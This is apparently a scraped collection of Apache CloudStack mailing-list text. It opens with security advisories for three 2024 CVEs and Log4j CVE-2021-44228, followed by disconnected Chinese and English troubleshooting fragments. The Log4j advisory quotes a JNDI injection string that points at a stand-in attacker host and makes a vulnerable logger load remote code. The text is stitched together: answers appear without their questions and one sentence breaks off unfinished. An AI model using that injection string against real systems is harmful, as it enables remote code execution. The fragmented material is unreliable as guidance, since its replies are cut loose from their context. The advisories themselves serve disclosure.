Apache CloudStack security releases 4.18.1.1 and 4.19.0.1 address the
CVEs listed below. Affected users are recommended to upgrade their
CloudStack installations.

1. CVE-2024-29006: x-forwarded-for HTTP header parsed by default

Severity: moderate

Description:

By default the CloudStack management server honours the
x-forwarded-for HTTP header and logs it as the source IP of an API
request. This could lead to authentication bypass and other
operational problems should an attacker decide to spoof their IP
address this way.

Affected versions: Apache CloudStack 4.11.0.0 through 4.18.1.0, and 4.19.0.0

2. CVE-2024-29007: When downloading templates or ISOs, the management
server and SSVM follow HTTP redirects with potentially dangerous
consequences

Severity: moderate

Affected versions: Apache CloudStack 4.9.1.0 through 4.18.1.0, and 4.19.0.0

Description:

The CloudStack management server and secondary storage VM could be
tricked into making requests to restricted or random resources by
means of following 301 HTTP redirects presented by external servers
when downloading templates or ISOs. Users are recommended to upgrade
to version 4.18.1.1 or 4.19.0.1, which fixes this issue.

3. CVE-2024-29008: The extraconfig feature can be abused to load
hypervisor resources on a VM instance

Severity: critical

Affected versions: Apache CloudStack 4.14.0.0 through 4.18.1.0, and 4.19.0.0

Description:

A problem has been identified in the CloudStack additional VM
configuration (extraconfig) feature which can be misused by anyone who
has privilege to deploy a VM instance or configure settings of an
already deployed VM instance, to configure additional VM configuration
even when the feature is not explicitly enabled by the administrator.
In a KVM based CloudStack environment, an attacker can exploit this
issue to attach host devices such as storage disks, and PCI and USB
devices such as network adapters and GPUs, in a regular VM instance
that can be further exploited to gain access to the underlying network
and storage infrastructure resources, and access any VM instance disks
on the local storage.

[ADVISORY] CloudStack Advisory on Apache Log4j Zero Day (CVE-2021-44228)

On 9th December 2021, a new zero-day vulnerability for Apache Log4j
was reported. It is by now tracked under CVE-2021-44228:

CVE-2021-44228 vulnerability is classified under the highest severity
mark and allows an attacker to execute arbitrary code by injecting a
sub-string in the form "${jndi:ldap://some.attacker-controlled.site/}";
into a logged message. Apache Log4j 2.x is reported to be affected as
it performs a lookup (string substitution) using the JNDI protocol,
whenever the "${jndi:...}" string is found within a message parameter.

The Apache Log4j developers [1] and the SLF4J project [2] advisory
confirm that Apache Log4j 1.x does not offer a look-up mechanism and
does not suffer remote code execution (RCE) vulnerability from
CVE-2021-44228.

All Apache CloudStack releases since v4.6 use Apache Log4j version
1.2.17 and therefore are not affected by this RCE vulnerability. Most
users who haven't changed the default log4j xml config don't need to
do anything, advanced users can check and fix their log4j xml
configuration if they're using any custom JMS appenders.

The Apache CloudStack project will consider migrating to a different
version of Apache Log4j in future releases.

I think the time frame proposed to sunset the old UI is doable and we'll

One of our challenges over the last few years is the added work of getting 
UI features into the release and it has added around 30% additional work load 
due to the older style code of the current UI. Having it in VUE is great and I 
think it will also encourage others to contribute.

关于cloudstack的物理网络与网络标签问题

各位好
本人学习cloudstack的时间不长，2个月左右。到现在都还没搞明白cloudstack里物理网络的意义！

登录cloudstack创建高级区域时，在物理网络界面，可以拖拽各种流量图标，然后可以点击各种流量进行网络标签编辑。网上有一些文章进行讲解，但至今我都不明白cloudstack物理网络和网络标签是怎样跟服务器物理网口（管理节点和计算节点）对应起来的？（以cloudstack
 + xenserver 例）

HI Tony我觉得你可以按照如下思路去检查：1. 在仪表盘查看二级存储有无容量显示2. 手动在虚拟化主机mount 
nfs的路径，看能否mount，并检查是否可以写入3. 在虚拟化节点上查看有无自动挂载主存储，并检查主存储是否可以写入

cloudstack怎样通过ssh连接虚拟机

1.我通过端口转发可以访问到虚拟机实例上面的http服务器,证明可以进行通信了.但是不懂怎样在另外一台机子上通过ssh去操作虚拟机,而不是通过浏览器控制台(输入反应反应比较慢),
2.还有就是为什么ping不通虚拟路由器?
3.虚拟路由器的默认登录账户名和密码是多少?

Hi Yan，

当主机处于avoid set，建议通过以下方法排查：

1. 在host中点击reconnect，查看日志是否有报错。
2. 如果host连接已经正常， 但仍然处于avoid set，那应该继续查看management-server.log, 
看虚拟机创建过程中什么资源不足，才导致cloudstack将host放入禁用列表。
3. 如果查看资源都充足，依然报错，您可回复完整日志。

登录shell之后手动执行service cloud-management start
就能正常启动

之前猜测是系统启动时网卡未启动导致读不到本机ip地址，最近在/etc/rc.local 写了sleep 120；再执行service
cloud-management start 和 ip addr add ip地址方法 还是不行。

ip地址是没问题的eth0 ip就是192.168.66.230

各位是否有遇到过这情况？我这系统是centos6.5 cloudstack版本是4.0.1.20130109153237

CLoudStack 添加KVM后 系统虚拟机状态为空

各位好：

 遇到一个问题，VMware上的一台VM上安装KVM及CloudStack Agent，将其添加
到CS4.3（简单网络）中去，系统虚拟机agent状态为空，console进去系统虚拟机，发
现它与来宾网络网关不通！！！这是什么原因？

 计算方案的限速，就是虚拟机网卡的速度，包括上行和下行。网络方案的限速，就是指路由器的上行和下行，虚拟机本身的速度与它无关。

 计算方案限制网卡是千兆还是百兆， 网络方案限制路由器是千兆还是百兆。  这样理解就简单了。

不太清楚你目前的网络环境，但是看log应该是跟现有的IP段有冲突。
你检查一下private Network吧

我是苏州的cloudstack忠实粉丝。现 我有一个很棘手的问题需要请教。
关于高级网络配置，
在 cloudstack中，无法在zone中的物理网络里 添加某一个ip地址段，
例如，这个物理网络里已经存在两行记录：
第一行：网关 172.180.10.1  子网掩码 255.255.255.0  VLAN 200  开始IP 172.180.10.80  结束IP 
172.180.10.90
第一行：网关 172.180.10.1  子网掩码 255.255.255.0  VLAN 200  开始IP 172.180.10.100  结束IP 
172.180.10.110

已经有人手动实现了这个功能，并申请了专利。
个人不建议在重要的生产环境这样搞，设计到存储、网络等一些问题，比较复杂，需要对CloudStack和vmware有较深的研究，有足够把握才能搞。
如果只是管理现有vCenter上的虚机，个人倒是建议再封装一层，做个portal，调用vCenter API 管理vcenter上的虚机

PS：不可以直接将现有vCenter加入到CloudStack中，可能现有的一些虚机会被删掉

cloudstack默认是不管原有的虚拟机的，你可以修改cloudstack代码实现！

Hello Johnny,

To do it properly you should convert all your VM's to templates ,add then
add them to cloudstack and finally you create vm 'sfrom these templates.

But if you wont an out of the box solution you should  make changes on the
source code , i've worked on such solution on xenserver and it was a long
dificult mdifications so i recommand that you do it as i sayed above using
the templates.

Cloudstack 4.4.2 添加第二个XenServer计算节点时报错

   前情提要: 群集内已有一个XenServer 6.2, 运行正常, 两个系统VM均正常运行, 但是尝试添加实例时失败,
查看日志发现有提示系统资源不足的关键字, 于是决定添加第二台的Xenserver.

可以在终端root/password登录手动删除日志。亦可以手动销毁，会自动重新创建。

在/usr/share/cloudstack-management/setup/create-schema-premium.sql这个文件报错的285行前加上 
 USE cloud；  这句，我当时也遇到这个错误。

你的数据库版本是多少？
如果是5.5以上 ，CS的数据库数据在初始化时 ，如果是高版本的数据库，会有点问题，具体的你查看：

这个bug，  新版本会解决，目前临时解决办法是你使用5.1版本数据库，或者，修改/usr/share/cloudstack-
management/setup/create-schema-premium.sql  这个文件中的的两行数据，具体请看：
https://github.com/apache/cloudstack/pull/67.patch
注意，67.patch文件下面两行  前面有+和- 符号的，添加‘cloud’.即可。

看上去像是MySQL 登陆认证失败
你试试 mysql -uroot -p
看本地能不能访问MySQL
